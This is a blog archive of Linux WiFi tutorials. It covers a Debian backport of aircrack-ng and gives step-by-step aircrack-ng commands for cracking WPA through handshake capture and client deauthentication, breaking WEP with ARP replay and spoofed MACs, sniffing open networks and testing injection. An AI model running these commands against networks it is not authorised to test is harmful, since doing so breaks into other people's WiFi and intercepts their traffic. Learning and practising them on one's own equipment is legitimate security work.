Category Archives: Wireless

Backport of Aircrack-ng for Debian Wheezy

I have created a backport of aircrack-ng based on the version in Jessie/Testing. This may be installed with the command:
dpkg -i aircrack-ng_1.1-6~bpo70+1_amd64.deb
(remove the package with command: dpkg -r aircrack-ng)
download here

This package is now available in Debian wheezy-backports.

Back in March 2012 I built the latest svn version from source, available here.
I have included the necessary scripts and binary files in the ‘bin/’ directory. Copy these to somewhere like: /usr/local/sbin/

Brute Forcing WPA WiFi Encryption

WPA and WPA2 provide good WiFi security which is mainly susceptible to brute force attacks. Here is how such a brute force attack may be carried out.
Using Debian Wheezy (testing) and an Intel Corporation Centrino Wireless-N 1000 card:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Enter monitor mode: airmon-ng start wlan0
  3. Find nearby networks: airodump-ng mon0
  4. Identify the target BSSID and Channel number (-c option below)
  5. Start packet capture and leave running: airodump-ng -c 6 –bssid 00:11:22:33:44:55 -w capturefile mon0
  6. Leave packet capture running until “WPA Handshake” is seen (displayed in the top-right of airodump-ng
  7. Or attempt to force a WPA Handshake by deauthenticating a client station: aireplay --deauth 1 -a 00:11:22:33:44:55 -c 55:55:55:55:55:55 --ignore-negative-one mon0 (where -c is the MAC address of one of the stations displayed in airodump-ng)
  8. Apply brute force: aircrack-ng -w password.lst capturefile.cap
  9. The password.lst is included in the ‘test/’ directory of the aircrack-ng source. Many others are available for download
  10. Stop monitor mode: airmon-ng stop mon0

Breaking WEP Encryption

Using Debian Wheezy (testing) with a Intel Corporation Centrino Wireless-N 1000 card…

    1. Stop network manager: /etc/init.d/network-manager stop
    2. Enter monitor mode: airmon-ng start wlan0
    3. Find nearby networks: airodump-ng mon0
    4. Identify the target BSSID, SSID and Channel number (-c option below)
    5. Start packet capture and leave running: airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capturefile mon0
    6. Run the following two commands at the same time in separate windows (-h changes our source address, to add some stealth)
      1. aireplay-ng --fakeauth 40 -a 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one mon0
      2. aireplay-ng --arpreplay -x 20 -b 00:11:22:33:44:55 -h 01:12:34:56:67:89 --ignore-negative-one -e SSID mon0
      3. when this sees an ARP packet, it will go like crazy injecting packets and you will see the "#Data" rapidly increasing in the airodump-ng window
    7. After collecting 30,000 packets (you may leave airodump-ng running): aircrack-ng -1 capturefile.cap
    8. The WEP key should then be displayed in the terminal window.
    9. The collected packet trace may be decrypted with: airdecap-ng -w $wep_key_hex capturefile.cap
    10. Exit monitor mode: airmon-ng stop mon0

Open Wireless Network Packet Sniffing

This is easier and more effective than packet sniffing on a wired network:

  1. Stop Network Manager: /etc/init.d/network-manager stop
  2. Set your WiFi card into monitoring mode: airmon-ng start wlan0
  3. See what’s around: airodump-ng mon0
  4. Select a target network, and note the BSSID value and channel (used as ‘-c‘ option below)
  5. Collect the packet trace: airodump-ng -c 6 --bssid 00:12:34:56:78:90 -w output-file mon0
  6. Examine packet trace: wireshare output-file.cap

(run on Debian Wheezy [testing] using Intel Corporation Centrino Wireless-N 1000)

WiFi Card – Packet Injection in Linux

Very simple way to test if your WiFi card supports injection:

Stop Network Manager: /etc/init.d/network-manager stop
Put the card in monitor mode: airmod-ng start wlan0
Test using: aireplay-ng -9 mon0

With luck, the following output is displayed:
Trying broadcast probe requests…
Injection is working!

I am using Debian Wheezy (testing) with WiFi card:
Network controller: Intel Corporation Centrino Wireless-N 1000